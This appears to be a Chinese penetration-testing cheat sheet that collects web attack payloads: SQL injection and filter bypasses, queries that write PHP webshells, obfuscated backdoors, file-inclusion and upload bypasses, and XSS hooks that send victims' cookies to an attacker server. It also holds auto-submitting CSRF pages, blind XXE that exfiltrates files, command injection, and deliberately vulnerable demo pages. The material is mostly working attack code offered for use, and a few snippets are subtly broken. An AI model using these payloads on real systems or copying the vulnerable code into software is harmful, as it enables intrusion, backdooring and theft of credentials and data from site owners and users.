渗透测试-20:Payload 总结
SQL注入
通用
select user(),version(),database()
select group_concat(schema_name) from information_schema.schemata
select group_concat(table_name) from information_schema.tables where table_schema=database()
select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='表名'
判断
// 字符型
?id=1xxx # 源码为 id='1xxx', 正常
?id=1' and '1'='1 # 源码为 id='1' and '1'='1', 有回显
?id=1' and '1'='2 # 源码为 id='1' and '1'='2', 无回显
// 数字型
?id=1xxx # 源码为 id=1xxx, 报错
?id=1 and 1=1 # 源码为 id=1 and 1=1, 有回显
?id=1 and 1=2 # 源码为 id=1 and 1=2, 无回显
// 列数
1' ORDER BY 3--+
1' GROUP BY 3--+
1' union select @,@,@--+
注入
// 搜索框
1' and 1=1 and '%'='
%' and 1=1--'
%' and 1=1 and '%'='
// 报错,DML常用
' or updatexml(CHAR(126),(注入点),0x7e),null) or '
?id=1' and updatexml(null,concat(CHAR(126),(注入点),0x7e),null) --+
' or extractvalue(null,concat(CHAR(126),(注入点),0x7e)) or '
?id=1' and extractvalue(null,concat(CHAR(126),(注入点),0x7e)) --+
?id=1' union select 1, count(*), concat((注入点),0x7e,floor(rand(14)*2)) as x from 表名 group by x --+
// 布尔盲注
and (select count(*) from information_schma.tables where table_schema=database())>5 --+
and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>5 --+
and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97 --+
// 时间盲注
and if((select count(*) from information_schema.schemata)>5,1,sleep(5)) --+
and if((select length(schema_name) from information_schema.schemata limit 0,1)>5,1,sleep(5)) --+
and if((select ascii(substr(schema_name,1,1)) from information_schema.schemata limit 0,1)>97,1,sleep(5)) --+
// 二次注入
流程:注册用户名 admin' # => 登录 admin' # => 修改密码导致 admin 密码被改
// 二次编码
1%2527 and 0 --+
// 宽字节
%df%27 or 1=1 --+
// Out of band
select @@version into outfile '\\\\192.168.0.100\\temp\\out.txt'
select @@version into dumpfile '\\\\192.168.0.100\\temp\\out.txt'
// DNSLog
?id=1' and (select load_file(concat('\\\\',(注入点),'.xxxxx.dnslog.cn/abc'))) --+
?id=1' and (select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'))) --+
?id=1' and (select load_file(concat(0x5c5c5c5c,version(),0x2e6861636b65722e736974655c5c612e747874))) --+
// 写shell
[...] union select 1,2,"<?php @eval($_POST['cmd']);?>" into outfile "C:/Program Files/ToolBoxs/PhpStudy/PHPTutorial/WWW/shell.php"
[...] UNION SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
[...] UNION SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo();?>'
[...] UNION SELECT 1,2,3,4,5,0x3c3f70687020706870696e666f28293b203f3e into outfile 'C:\\wamp\\www\\pwnd.php'
[...] union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'
[...] UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPFILE 'C:/Program Files/EasyPHP-12.1/www/shell.php'
[...] UNION SELECT 0x3c3f7068702073797374656d28245f4745545b2763275d293b203f3e INTO DUMPFILE '/var/www/html/images/shell.php';
绕过
?id=-1 UNiOn SelEcT 1,2,3;%00
/*!11111select version()*/
select * from users where id=8E0union select 1,2,3
?id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109))%23
Select substr(database() from 1 for 1)
Select mid(database() from 1 for 1)
select * from news limit 1 offset 0
select user() like 'r%'
or 'swords'='sw'+'ords';EXEC('IN'+'SERT INTO'+'')
select%0a*%0afrom%0ausers;
select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64
select strcmp(left(database(),1),0x32)
?id=?id=11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111 or 1 --+
?id=-1 union selselectect 1,2,3 --+
?id=1&id=-1'
?id=-1 union %2573%65%6c%65%63%74 1,2,database()
?id=1") union/*!88888xxxxx*/%23%0aselect 1,2,3 --+
?id=1") order/*!88888xxxxx*/by 3 --+
?id=") group by 3 --+
?id=--1' union select 1,2,group_concat(key.key) from /*sql-yunsuo*/.key --+
?id=/*-1' union select 1,2,3 --+
?id=/*' union select 1,2,(select/**/`key` from `key`)--+`
?id=1'/*xxxxxxxx*/order/*xxxxxxxx*/by 3 --+
?id=10000'/*xxxxxxxx*/%23%0aunion%23%0a/*xxxxxxxx*/select 1,database/*xxxxxxxx*/(),group_concat(/*xxxxxxxx*/user.key/*xxxxxxxx*/from database.user) --+
等价替换
0x7573657273 => "users"
%6f%72%20%31%3d%31 => or 1=1
char(0x67)+char(0x75)+char(0x65)+char(0x73)+char(0x74) => "guest"
hex() bin() => ascii()
sleep(3) => benchmark(200000000,encode('a','b'))
concat_ws() => group_concat()
json_arrayagg() => group_concat() (MySQL >= 5.7.22)
mid() substr() => substring()
@@user => user()
@@datadir => datadir()
like => =
group by 1 => order by 1
+ => 空格
0x3a => :
0x3c62723e => <br>
%23%0a = 注释换行
and => &&
or => ||
xor => |
not => !
() => 空格
+ => 空格
%0a => 空格
%a0 => 空格
tab => 空格
空格空格 => 空格
/* */ => 空格
/*!88888xxxxxx*/ => 空格
// -- /* */ # --+ --- ;%00 --a /*!表示不注释*/ /*!88888当数字大于mysql版本时算注释*/
文件包含
常见的敏感信息路径
Windows
// 查看系统版本
c:\boot.ini
// IIS配置文件
c:\windows\system32\inetsrv\MetaBase.xml
// 存储Windows系统初次安装的密码
c:\windows\repair\sam
// MySQL配置
c:\ProgramFiles\mysql\my.ini
// MySQL root密码
c:\ProgramFiles\mysql\data\mysql\user.MYD
// php 配置信息
c:\windows\php.ini
Linux/Unix
// 账户信息
/etc/passwd
// 账户密码文件
/etc/shadow
// Apache2默认配置文件
/usr/local/app/apache2/conf/httpd.conf
// 虚拟网站配置
/usr/local/app/apache2/conf/extra/httpd-vhost.conf
// PHP相关配置
/usr/local/app/php5/lib/php.ini
// Apache配置文件
/etc/httpd/conf/httpd.conf
// mysql 配置文件
/etc/my.conf
其他
可以通过 phpinfo() 中的 session.save_path 查看 session 的存储位置,默认为 /var/lib/php/session
payload
php?filename=../../../../../../../boot.ini%00
// Windows下目录最大长度为256字节,超出的部分会被丢弃;
// Linux下目录最大长度为4096字节,超出的部分会被丢弃。
php?filename=test.txt/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
php?filename=test.txt.................................................................................................................................................................................................................................................................................................................................................
// 伪协议
php?filename=http://192.168.91.133/FI/php.txt
php?filename=http://192.168.91.133/FI/php.txt%3f (?)
php?filename=http://192.168.91.133/FI/php.txt%23 (#)
php?filename=http://192.168.91.133/FI/php.txt%20 ( )
php?filename=php://filter/convert.base64-encode/resource=xxx.php
php?filename=php://filter/read=convert.base64-encode/resource=xxx.php
php?filename=php://input post => <?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');?>
php?filename=file://c:/boot.ini
php?filename=data://text/plain;base64;PD9waHAgcGhwaW5mbygpOw==
// 将shell.php用zip协议打成压缩包,并将压缩包命名为shell.png
php?filename=phar://shell.png/shell.php post => cmd=phpinfo();
php?filename=zip://shell.png%23shell.php post => cmd=phpinfo();
文件上传
php写shell
// FILE_APPEND 如果文件 filename 已经存在,追加数据而不是覆盖。LOCK_EX 在写入时获得一个独占锁。
file_put_contents("xxx.php", '<?php @eval($_POST["cmd"]?>', FILE_APPEND | LOCK_EX);
fwrite(fopen("xxx.php","a+"), '<?php @eval($_POST["cmd"]?>');
fputs(fopen("xxx.php","a+"), '<?php @eval($_POST["cmd"]?>');
绕马
<?php asset($_POST["cmd"]);?>
<?php $_POST["a"]($_POST["b"]);?> post => a=assert&b=phpinfo()
<?php $a = substr_replace("assxxx","ert",3);$a($_POST["cmd"]);?>
<?php function test($a){$a($_POST["cmd"]);} test("assert");?>
<?php function test($func,$param){return $func($param);} test("assert",$_POST["cmd"]);?>
<?php call_user_func($_POST["a"],$_POST["b"]);?> post => a=assert&b=phpinfo()
<?php forward_static_call_array("assert",array($_POST["cmd"]));?>
<?php $a=base64_decode($_POST["cmd"]);assert($a);?>
<?php $a = base64_decode("YXNzZXJ0");$a($_POST["cmd"]);?>
<?php $a = ("!"^"@")."ssert";$a($_POST["cmd"]);?>
<?php $_ = ("$"^"{}").("~"^".").("/"^"`").("-"^"~").("("^"|");${$_}["a"](${$_}["b"]);?>
<?php $a = chr(97).chr(115).chr(115).chr(101).chr(114).chr(116);$a(${chr(95).chr(80).chr(79).chr(83).chr(84)}[chr(34).chr(99).chr(109).chr(100).chr(34)]);?>
<?php class Test{var $a;var $b;function __construct($a, $b) {$this->a = $a;$this->b = $b;}function demo() {array_map($this->a,$this->b);}} $t = new Test("assert",array($_POST["cmd"]));$t->demo();?>
// 在线转换地址:https://www.toolfk.com/tools/convert-php.html
// 原始
<?php @eval($_POST['cmd']);?>
// 加密
<?php $O00OO0 = urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");
$O00O0O = $O00OO0{
3} . $O00OO0{
6} . $O00OO0{
33} . $O00OO0{
30};
$O0OO00 = $O00OO0{
33} . $O00OO0{
10} . $O00OO0{
24} . $O00OO0{
10} . $O00OO0{
24};
$OO0O00 = $O0OO00{
0} . $O00OO0{
18} . $O00OO0{
3} . $O0OO00{
0}
. $O0OO00{
1} . $O00OO0{
24};
$OO0000 = $O00OO0{
7} . $O00OO0{
13};
$O00O0O .= $O00OO0{
22} . $O00OO0{
36}
. $O00OO0{
29} . $O00OO0{
26} . $O00OO0{
30} . $O00OO0{
32} . $O00OO0{
35} . $O00OO0{
26} . $O00OO0{
30};
eval($O00O0O("JE8wTzAwMD0iSlhLaUNzSFRCenRFZ2t1UFJuVWxxV29lYnlORFZ4ckZPdmpMcEFhU21jd2ZkUWhHWllJTVFsbXlIRnZTR3hrVXBoc1p0UEJxb0t1TkVpblJ6SmZBY3dDVGpYTURkZ0xyWVdWYmFlSU9aUjlMTXZYcFdiejJlS0x1UUE5V1MxbkJLaVlDRUtXUGxEaDdaeDQ9IjsgIAogICAgICAgIGV2YWwoJz8+Jy4kTzAwTzBPKCRPME9PMDAoJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAqMiksJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAsJE9PMDAwMCksICAgIAogICAgICAgICRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));
?>
// 混淆
<?php function EDnRK($kYsyl)
{
$kYsyl = gzinflate(base64_decode($kYsyl));
for ($i = 0; $i < strlen($kYsyl); $i++) {
$kYsyl[$i] = chr(ord($kYsyl[$i]) - 1);
}
return $kYsyl;
}
eval(EDnRK("U1QEAce08qRcTdWEwICQ0BiNlLxUjTgtGwd7AA=="));
?>
改包绕过
Content-Type: image/jpeg
// 先上传 .htaccess 文件,允许解析当前目录的 .jpg 文件,.htaccess 文件写入如下内容
SetHandler application/x-httpd-php
Content-Disposition: filename="shell.phtml"
Content-Disposition: filename="shell.php.xxx"
Content-Disposition: filename="shell.pHP"
Content-Disposition: filename="shell.php "
Content-Disposition: filename="shell.php."
Content-Disposition: filename="shell.php::$DATA"
Content-Disposition: filename="shell.php::$DA::$DATATA"
Content-Disposition: filename="shell.php. ."
Content-Disposition: filename="shell.pphphp"
Content-Disposition: filename="shell.php/."
// 修改一句话木马文件,在头部加上 GIF89a,将文件重命名为 .gif 后缀,再利用文件包含
?file=upload/4420220324224731.gif
// 00截断(GET)
POST /upload-labs/Pass-12/index.php?save_path=../upload/shell.php%00
Content-Disposition: filename="shell.jpg"
Content-Type: image/jpeg
// 00截断(POST)
Content-Disposition: filename="shell.jpg"
Content-Type: image/jpeg
在Hex中修改路径:../upload/ => ../upload/shell.php0 => ../upload/shell.php
// 二次渲染绕过,上传一个正常图片,然后下载下来与原来的图片做对比,用工具找到没有发生改变的地方,写入一句话,保存后再次上传
// 条件竞争绕过,先开启 python 请求脚本,再用 BurpSuite 爆破模块的 Null payloads 模式使用多线程一直发包上传一句话木马
// 7z后缀并不被Apache服务器所识别,却在上传文件名后缀的白名单中,可以利用Apache的解析漏洞将上传的7z后缀文件当做php文件解析
XSS
反射型
漏洞服务器
vul-page-reflected.php
<?php
header('content-type:text/html;charset=utf-8');
session_start();
if (isset($_GET['action'])) {
$action = $_GET['action'];
// ?action=<script>alert(1)</script>
echo $action;
if ($action == 'logout') {
unset($_SESSION['name']);
echo '成功退出';
header("refresh:1;url='./vul-page-reflected.php'");
} else {
header("refresh:1;url='./vul-page-reflected.php'");
}
} else {
if (isset($_SESSION['name'])) {
$name = $_SESSION['name'];
echo "<a href='./vul-page-reflected.php?action=logout'>退出</a><br>";
echo "欢迎 $name , 尊敬的vip 请留言!";
echo "<h3>请留言:</h3>";
echo "<form action='' method='post'>";
echo "<textarea cols=30 rows=5 name='message'></textarea><br>";
echo "<input type='submit' value='提交'></form>";
if (isset($_POST['message'])) {
echo " $name 说: {$_POST['message']}";
}
} else if (isset($_POST['name']) && isset($_POST['passwd'])) {
$name = $_POST['name'];
$passwd = $_POST['passwd'];
if ($name == 'admin' && $passwd == '123456') {
$_SESSION['name'] = $name;
header('refresh:1;url="./vul-page-reflected.php"');
} else {
echo '账户或密码错误!';
header('refresh:1;url="./vul-page-reflected.php"');
}
} else {
echo "<h1>登录</h1>";
echo "<form action='' method='post'>";
echo "账户:<input type='text' name='name'><br>";
echo "密码:<input type='password' name='passwd'><br>";
echo "<input type='submit' value='ok'></form>";
}
}
模拟演示-GET型
攻击者服务器
/xss/cookie-get.php
<?php
$cookie = $_GET['cookie'];
file_put_contents('cookie.txt',$cookie);
/xss/hook-get.js
xmlhttp = new XMLHttpRequest();
xmlhttp.open(
"get",
"http://[攻击者服务器IP]/xss/cookie-get.php?cookie=" + document.cookie,
true // 开启异步
);
xmlhttp.send();
钓鱼页面
xss-get.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<title>XSS-GET</title>
</head>
<body>
<!-- 直接跳转到攻击者服务器 -->
<a
href="http://[漏洞服务器IP]/vul-page-reflected.php/?name=<script>document.location='http://[攻击者服务器IP]/xss/cookie-get.php?cookie='%2Bdocument.cookie</script>"
>点我有惊喜</a
>
<!-- 用 ajax 异步访问攻击者服务器 -->
<a
href="http://[漏洞服务器IP]/vul-page-reflected.php/?name=<script src='http://[攻击者服务器IP]/xss/hook-get.js'></script>"
>点我也有惊喜</a
>
</body>
</html>
模拟演示-POST型
攻击者服务器
/xss/cookie-post.php
<?php
$cookie = $_POST['cookie'];
file_put_contents('cookie.txt',$cookie);
/xss/hook-post.js
xmlhttp = new XMLHttpRequest();
xmlhttp.open(
"post",
"http://[攻击者服务器IP]/xss/cookie-post.php",
true // 开启异步
);
xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xmlhttp.send("cookie=" + document.cookie);
钓鱼页面
xss-post.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<title>XSS-POST</title>
</head>
<body>
<form action="http://[漏洞服务器IP]/vul-page-reflected.php" method="post">
<input
type="hidden"
name="message"
value="<script src='[攻击者服务器IP]/xss/hook-post.js'></script>"
/>
<input type="submit" value="点我有惊喜" />
</form>
</body>
</html>
存储型
漏洞服务器
vul-page-stored.php
<?php
if (isset($_POST['message'])) {
$message = $_POST['message'];
file_put_contents('message.txt', $message);
}
?>
<html>
<head>
<meta charset="utf-8">
<title>Stored XSS</title>
</head>
<body>
<form action="" method="post">
留下你的评论:<textarea cols="30" rows="5" name="message" /></textarea>
<input type="submit" value="提交">
</form>
<p>游客说:
<?php
if (file_exists('message.txt')) {
echo file_get_contents('message.txt');
} else {
echo "暂无评论!";
}
?>
</p>
</body>
</html>
DOM型
漏洞服务器
vul-page-dom.php
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>DOM XSS</title>
</head>
<body>
<div>name:
<script>
if (document.location.href.indexOf("name=") >= 0) {
var name = document.location.href.substring(document.location.href.indexOf("name=") + 5);
document.write(decodeURI(name));
} else {
document.write('张三');
}
</script>
</div>
<form>
输入大名:<input name="name">
<input type="submit" value="ok">
</form>
</body>
</html>
payload
// 常规操作
<script>alert(1)</script>
<script src="http://[ip]/[my.js]"></script>
// src属性绕过
<img src=x onerror=alert(1)>
<img/src=x onerror=alert(1)>
<video src=x onerror=alert(1)>
<audio src=x onerror=alert(1)>
// iframe 绕过
<iframe src="javascript:alert(1)">
<iframe onload="alert(1)">
// a标签绕过
<a href="javascript:onclick=alert(1)">test</a>
<a href="javascript:alert(1)">test</a>
// script绕过
<scRiPt>alert(1)</scrIPt>
<scr<script>ipt>alert(1)</scr<script>ipt>
// 事件绕过
<svg onload=alert(1)>
<body onload=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<video><source onerror="javascript:alert(1)">
// 圆括号绕过
<a onmouseover="javascript:window.onerror=alert;throw 1"></a>
<img src=x onerror="javascript:window.onerror=alert;throw 1">
<script>alert`1`</script>
<img src=1 onerror=location="javascript:"+"aler"+"t%281%29">
// 在不需要任何用户交互的情况下执行脚本
<style onreadystatechange=alert(1)></style>
<iframe onreadystatechange=alert(1)></iframe>
<object onerror=alert(1)></object>
<img type=image src=valid.gif onreadystatechange=alert(1)>
<input type=image src=valid.gif onreadystatechange=alert(1)>
<body onbeforeactivate=alert(1)></body>
<video src=1 onerror=alert(1)></video>
<audio src=1 onerror=alert(1)>
// 伪协议
<object data=javascript:alert(1)></object>
<iframe src=javascript:alert(1)></iframe>
<event-source src=javascript:alert(1)></event-source>
// < 被转义 (点击事件绕过)
' onclick='alert(1)
" onclick="alert(1)
// script 被过滤,alert 被过滤 (换标签绕过)
<a onclick="alert(1)">test</a>
// < 被转义,script 被转义 (大小写绕过)
" ONclick="alert(1)
"><ScRiPt>alert(document.cookie)</ScRiPt>
// 编码绕过
"%3e%3cscript%3ealert(document.cookie)%3c/script%3e
// script 被过滤,< > 被转义 (双写绕过:绕过on)
" oonnclick="alert(1)
"><scr<script>ipt>alert(document.cookie)</scr</script>ipt>
<img o[%00]nerror=alert(1) src=a>
// script 被转义,< > 被转义 (伪协议绕过)
"><a href="javascript:alert(1)">test</a>"
// javascript 中的 i 被过滤 (HTML实体字符绕过)
javascript:alert(1)
<script>alert(1)</script>
// script、/、空格 被替换为 (换行绕过:%00 %09 %0d %0a)
<img%0Dsrc=x%0Donerror="alert(1)"/>
<img src=x onerror="javascript:window.onerror=alert;throw 1">
// <input type="text" name="name" value="test-text" >
"><script>alert(1)</script>
// <script>var a='test-text'; var b=123;...</script>
'; alert(1); var foo='
// <a href="test-text">Click here</a>html
javascript:alert(1);
CSRF
钓鱼页面
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form
action="http://[漏洞服务器IP]/csrf-bank/change.php"
method="post"
id="csrf"
>
<input type="hidden" name="number" value="200" /><br />
<input type="hidden" name="name" value="hacker" /><br />
<input type="submit" value="Submit request" />
</form>
</body>
<script>
// 自动提交表单
document.getElementById("csrf").submit();
</script>
</html>
referer绕过
钓鱼页面
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<title>CSRF利用</title>
</head>
<body>
<a
id="demo"
href="http://[漏洞服务器IP]/dvwa/vulnerabilities/xss_r/?name=<scriPt src=http://[攻击者服务器IP]/csrf/hook.js></scriPt>"
>
点我有惊喜!
</a>
</body>
</html>
/csrf/hook.js
xmlhttp = new XMLHttpRequest();
xmlhttp.open(
"get",
"http://[漏洞服务器IP]/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change"
);
xmlhttp.send();
token绕过
钓鱼页面
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<title>token类型CSRF</title>
</head>
<body>
<h1>token类型CSRF利用</h1>
<a
href="http://[漏洞服务器IP]/dvwa/vulnerabilities/xss_d/?default=Spanish#<script src=http://[攻击者服务器IP]/csrf/hook.js></script>"
>
点我有惊喜!
</a>
</body>
</html>
/csrf/hook.js
var url = "http://[漏洞服务器IP]/dvwa/vulnerabilities/csrf/";
if (window.XMLHttpRequest) {
xmlhttp = new XMLHttpRequest();
} else {
// 老版本的 Internet Explorer (IE5 和 IE6)使用 ActiveX 对象
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
}
var count = 0;
xmlhttp.withCredentials = true;
xmlhttp.onreadystatechange = function () {
if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
var content = xmlhttp.responseText;
var pattern = "user_token' value='(.*?)'";
var match = content.match(pattern);
var token = match[1];
var new_url =
"http://[漏洞服务器IP]/dvwa/vulnerabilities/csrf/?user_token=" +
token +
"&password_new=password&password_conf=password&Change=Change";
if (count == 0) {
count++;
xmlhttp.open("GET", new_url, false);
xmlhttp.send();
}
}
};
xmlhttp.open("GET", url, false);
xmlhttp.send();
SSRF
XXE
有回显
payload
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
无回显
攻击者服务器
attack.dtd
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=[目标文件及路径]">
<!ENTITY % payload "<!ENTITY % getcontent SYSTEM 'http://[攻击者服务器IP]/xxe/getcontent.php?content=%file;'>">
%file;
%payload;
%getcontent;
getcontent.php
<?php
$content = $_GET['content'];
$content = base64_decode($content);
file_put_contents("xxe_results.txt", $content);
payload
<?xml version="1.0"?>
<!DOCTYPE root[
<!ENTITY % xxe SYSTEM "http://[攻击者服务器IP]/xxe/attack.dtd">
%xxe;
]>
CRE
代码执行
file_put_contents("xxx.php", '<?php @eval($_POST["cmd"]?>', FILE_APPEND | LOCK_EX);
fwrite(fopen("xxx.php","a+"), '<?php @eval($_POST["cmd"]?>');
fputs(fopen("xxx.php","a+"), '<?php @eval($_POST["cmd"]?>');
命令执行
|ls
|cat${IFS}key.ph*
|cat${IFS}key.ph?
|echo "<?php @eval(\$_POST['cmd']);?>" > shell.php
|cat shell.php
反序列化
访问控制符:public/protected/private
<?php
header("content-type:text/html;charset=utf-8;");
class People
{
public $name = "张三";
protected $age = 18;
private $money = 100.5;
public function __construct($name, $age, $money)
{
$this->name = $name;
$this->age = $age;
$this->money = $money;
}
public function hello()
{
echo "My name is $this->name ,my age is $this->age ! ";
echo "I have $this->money RMB!";
}
}
$obj = new People("李四", 20, 175.5);
echo serialize($obj);
// O:6:"People":3:{s:4:"name";s:6:"李四";s:6:"*age";i:20;s:13:"Peoplemoney";d:175.5;}
$str = 'O:6:"People":3:{s:4:"name";s:6:"王五";S:6:"\00*\00age";i:22;S:13:"\00People\00money";d:180.5;}';
$obj = unserialize($str);
$obj->hello();
// My name is 王五 ,my age is 22 !
// I have 180.5 RMB!
注意:
- 属性数量大于真实数量时,会绕过
__wakeup方法 - protected 属性写成
S:6:"\00*\00age";,其中\00表示空格 - private 属性写成
S:13:"\00People\00money";,其中People时类名
数组:
a:1:{i:0;O:6:"readme":1:{s:6:"source";s:8:"flag.php";}}
